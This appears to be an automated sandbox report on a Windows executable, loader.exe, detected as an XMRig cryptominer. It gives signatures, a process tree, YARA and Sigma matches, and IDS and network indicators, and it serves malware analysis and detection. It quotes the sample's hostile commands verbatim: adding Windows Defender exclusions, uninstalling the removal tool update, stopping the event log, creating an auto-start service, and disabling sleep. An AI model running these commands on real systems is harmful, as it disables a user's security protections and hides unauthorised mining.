
Windows Analysis Report
loader.exe

Overview

General Information

Sample name: loader.exe
Analysis ID: 1537414
MD5: cdabdc02374167ccd4938e9fe8c31789
SHA1: 59028bd5da928a0aadf157c39ac2c9281dcc881d
SHA256: 9161be21746469b9b3c653b81d7ca6639927e89ece780a4682a2059ba30e2793
Tags: exe, user-aachum

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Suricata IDS alerts for network traffic
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Connects to a pastebin service (likely for C&C)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Found strings related to Crypto-Mining
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • loader.exe (PID: 3228 cmdline: "C:\Users\user\Desktop\loader.exe" MD5: CDABDC02374167CCD4938E9FE8C31789)
    • powershell.exe (PID: 5020 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6096 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 7200 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 3864 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 2724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 4476 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 1780 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6820 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 6952 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 988 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
    • sc.exe (PID: 2488 cmdline: C:\Windows\system32\sc.exe delete "NUTGFFPE" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7220 cmdline: C:\Windows\system32\sc.exe create "NUTGFFPE" binpath= "C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7272 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7280 cmdline: C:\Windows\system32\sc.exe start "NUTGFFPE" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wepulfrfkvoz.exe (PID: 7348 cmdline: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe MD5: CDABDC02374167CCD4938E9FE8C31789)
    • powershell.exe (PID: 7372 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7556 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 7832 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 7564 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7580 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7596 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7620 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 7648 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 696 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 592 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1084 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1200 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1252 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1296 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1316 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1408 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1488 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1496 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • dialer.exe (PID: 7712 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • dialer.exe (PID: 7784 cmdline: dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
  • cleanup
Malware configuration and threat name lookup

  • Name: xmrig
  • Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
  • Attribution: No Attribution
  • Blogpost URLs: none listed
  • Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Yara matches (Source | Rule | Description | Author | Strings)

  • sslproxydump.pcap | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
  • 0000002B.00000002.3126900800.0000000140001000.00000040.00000001.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
  • 0000002B.00000002.3126900800.0000000140001000.00000040.00000001.00020000.00000000.sdmp | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
    • 0x37eb98:$a1: mining.set_target
    • 0x370e20:$a2: XMRIG_HOSTNAME
    • 0x373748:$a3: Usage: xmrig [OPTIONS]
    • 0x370df8:$a4: XMRIG_VERSION
  • 43.2.dialer.exe.140000000.0.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
  • 43.2.dialer.exe.140000000.0.unpack | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
    • 0x37ef98:$a1: mining.set_target
    • 0x371220:$a2: XMRIG_HOSTNAME
    • 0x373b48:$a3: Usage: xmrig [OPTIONS]
    • 0x3711f8:$a4: XMRIG_VERSION
  • 43.2.dialer.exe.140000000.0.unpack | MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth
    • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
  • 43.2.dialer.exe.140000000.0.unpack | MALWARE_Win_CoinMiner02 | Detects coinmining malware | ditekSHen
    • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
    • 0x3cd180:$s3: \\.\WinRing0_
    • 0x376148:$s4: pool_wallet
    • 0x3705f0:$s5: cryptonight

Change of critical system settings

Source: Process started | Author: Joe Security | Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\loader.exe", ParentImage: C:\Users\user\Desktop\loader.exe, ParentProcessId: 3228, ParentProcessName: loader.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 3864, ProcessName: powercfg.exe

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\loader.exe", ParentImage: C:\Users\user\Desktop\loader.exe, ParentProcessId: 3228, ParentProcessName: loader.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 5020, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\loader.exe", ParentImage: C:\Users\user\Desktop\loader.exe, ParentProcessId: 3228, ParentProcessName: loader.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 5020, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 6952, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe
Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: C:\Windows\system32\sc.exe create "NUTGFFPE" binpath= "C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "NUTGFFPE" binpath= "C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\loader.exe", ParentImage: C:\Users\user\Desktop\loader.exe, ParentProcessId: 3228, ParentProcessName: loader.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "NUTGFFPE" binpath= "C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe" start= "auto", ProcessId: 7220, ProcessName: sc.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\loader.exe", ParentImage: C:\Users\user\Desktop\loader.exe, ParentProcessId: 3228, ParentProcessName: loader.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 5020, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started | Author: Joe Security | Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\loader.exe", ParentImage: C:\Users\user\Desktop\loader.exe, ParentProcessId: 3228, ParentProcessName: loader.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 7272, ProcessName: sc.exe

Suricata IDS alerts

Timestamp                        SID      Severity  Classtype                                  Source IP      Source Port  Destination IP   Destination Port  Protocol
2024-10-18T23:09:19.985310+0200  2036289  2         Crypto Currency Mining Activity Detected   192.168.2.4    53440        1.1.1.1          53                UDP
2024-10-18T23:09:21.900075+0200  2054247  1         A Network Trojan was detected              104.20.4.235   443          192.168.2.4      49735             TCP
2024-10-18T23:09:21.281682+0200  2826930  2         Crypto Currency Mining Activity Detected   192.168.2.4    49736        142.202.242.43   443               TCP


AV Detection

Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe | ReversingLabs: Detection: 63%
Source: loader.exe | ReversingLabs: Detection: 63%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability

Bitcoin Miner

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 43.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000002B.00000002.3126900800.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: dialer.exe | String found in binary or memory: cryptonight-monerov7
Source: loader.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb | source: wepulfrfkvoz.exe, 00000019.00000003.1877581425.000001B8C6200000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Windows\System32\winlogon.exe | Code function: 20_2_00000225DC64DCE0 FindFirstFileExW,20_2_00000225DC64DCE0
Source: C:\Windows\System32\winlogon.exe | Code function: 20_2_00000225DC6ADCE0 FindFirstFileExW,20_2_00000225DC6ADCE0
Source: C:\Windows\System32\lsass.exe | Code function: 26_2_00000202C0AEDCE0 FindFirstFileExW,26_2_00000202C0AEDCE0
Source: C:\Windows\System32\svchost.exe | Code function: 29_2_000002A66130DCE0 FindFirstFileExW,29_2_000002A66130DCE0
Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAAEDFDCE0 FindFirstFileExW,30_2_000002BAAEDFDCE0
Source: C:\Windows\System32\svchost.exe | Code function: 45_2_0000026A879CDCE0 FindFirstFileExW,45_2_0000026A879CDCE0
Source: C:\Windows\System32\svchost.exe | Code function: 46_2_00000179537ADCE0 FindFirstFileExW,46_2_00000179537ADCE0
Source: C:\Windows\System32\svchost.exe | Code function: 47_2_000002295D56DCE0 FindFirstFileExW,47_2_000002295D56DCE0
Source: C:\Windows\System32\svchost.exe | Code function: 50_2_0000025306E6DCE0 FindFirstFileExW,50_2_0000025306E6DCE0
Source: C:\Windows\System32\svchost.exe | Code function: 51_2_000001845B3CDCE0 FindFirstFileExW,51_2_000001845B3CDCE0
Source: C:\Windows\System32\svchost.exe | Code function: 53_2_000001ADECD4DCE0 FindFirstFileExW,53_2_000001ADECD4DCE0
Source: C:\Windows\System32\svchost.exe | Code function: 54_2_000001D55907DCE0 FindFirstFileExW,54_2_000001D55907DCE0
Source: C:\Windows\System32\svchost.exe | Code function: 55_2_00000241A9EADCE0 FindFirstFileExW,55_2_00000241A9EADCE0
Source: C:\Windows\System32\svchost.exe | Code function: 56_2_000001CD7319DCE0 FindFirstFileExW,56_2_000001CD7319DCE0
Source: C:\Windows\System32\svchost.exe | Code function: 57_2_000002824E89DCE0 FindFirstFileExW,57_2_000002824E89DCE0
Source: C:\Windows\System32\svchost.exe | Code function: 58_2_0000021B47B3DCE0 FindFirstFileExW,58_2_0000021B47B3DCE0

Networking

Source: Network traffic | Suricata IDS: 2054247 - Severity 1 - ET MALWARE SilentCryptoMiner Agent Config Inbound : 104.20.4.235:443 -> 192.168.2.4:49735
Source: unknown | DNS query: name: pastebin.com
Source: Joe Sandbox View | IP Address: 104.20.4.235
Source: Joe Sandbox View | IP Address: 142.202.242.43
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Network traffic | Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.4:53440 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.4:49736 -> 142.202.242.43:443
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /raw/f2EfCEn0 HTTP/1.1  Accept: */*  Connection: close  Host: pastebin.com  User-Agent: cpp-httplib/0.12.6
Source: global traffic | DNS traffic detected: DNS query: pool.hashvault.pro
Source: global traffic | DNS traffic detected: DNS query: pastebin.com
Source: wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: wepulfrfkvoz.exe, 00000019.00000003.1877581425.000001B8C6200000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: wepulfrfkvoz.exe, 00000019.00000003.1877581425.000001B8C6200000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: wepulfrfkvoz.exe, 00000019.00000003.1877581425.000001B8C6200000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: wepulfrfkvoz.exe, 00000019.00000003.1877581425.000001B8C6200000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.sectigo.com0
Source: wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://sectigo.com/CPS0
Source: wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.globalsign.com/repository/0
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734

System Summary

Source: 43.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 43.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 43.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
Source: 0000002B.00000002.3126900800.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Users\user\Desktop\loader.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
